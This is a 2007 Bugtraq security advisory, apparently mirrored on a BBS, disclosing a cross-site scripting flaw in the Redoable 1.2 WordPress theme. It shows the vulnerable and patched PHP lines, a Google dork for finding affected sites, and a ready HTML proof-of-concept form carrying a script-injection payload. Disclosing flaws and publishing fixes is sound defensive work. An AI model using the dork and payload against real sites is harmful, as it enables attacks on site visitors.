RedLevel Advisory #015 - Redoable 1.2 Cross-Site Scripting

看板Bugtraq作者時間18年前 (2007/05/18 05:01), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
note to editors: this patch resolves this vulnerability: http://redlevel.org/wp-content/uploads/patch.zip <!-- Redoable 1.2 - Cross-Site Scripting Vulnerability --------------- Vulnerable Code --------------- header.php (line 6): .... elseif (is_search()) { ?> Search for <?php echo $s } ... searchloop.php (line 24): elseif (is_search()) { printf(__('Search Results for \'%s\'','redo_domain'), $s); } ------------ Patched Code ------------ header.php (line 6 FIXED): .... elseif (is_search()) { ?> Search for <?php echo strip_tags($s); } ... searchloop.php (line 24 FIXED): elseif (is_search()) { printf(__('Search Results for \'%s\'','redo_domain'), strip_tags($s)); } Vulnerable Variable: s Vulnerable File: wp-content/themes/redoable/searchloop.php and header.php Vulnerable: Redoable 1.2 (other versions should also be vulnerable) Google d0rk: "and Redoable 1.2" John Martinelli john@martinelli.com RedLevel Security http://www.RedLevel.org May 17th, 2007 !--> <html> <head><title>Redoable 1.2 - Cross-Site Scripting Vulnerability</title><body> <center><br><br> <font size=4>Redoable 1.2 - Cross-Site Scripting Vulnerability</font><br> <font size=3>discovered by <a href="John" rel="nofollow">http://john-martinelli.com">John Martinelli</a> of <a href="RedLevel" rel="nofollow">http://redlevel.org">RedLevel Security</a><br><br> Google d0rk: <a href=""and" rel="nofollow">http://www.google.com/search?q=%22and+Redoable+1.2%22">"and Redoable 1.2"</a> </font><br><br><br> <center>file <b>index.php</b> - variable <b>s</b> - method <b>get</b></center><br> <form action="http://www.target.com/index.php" method="get"> <input size=75 name="s" value="</title><script>alert(1)</script>"> <input type=submit value="Execute XSS Attack" class="button"> </form> <br><br><br> </form> </body></html>
更多 john. 的文章
文章代碼(AID): #16JCAj00 (Bugtraq)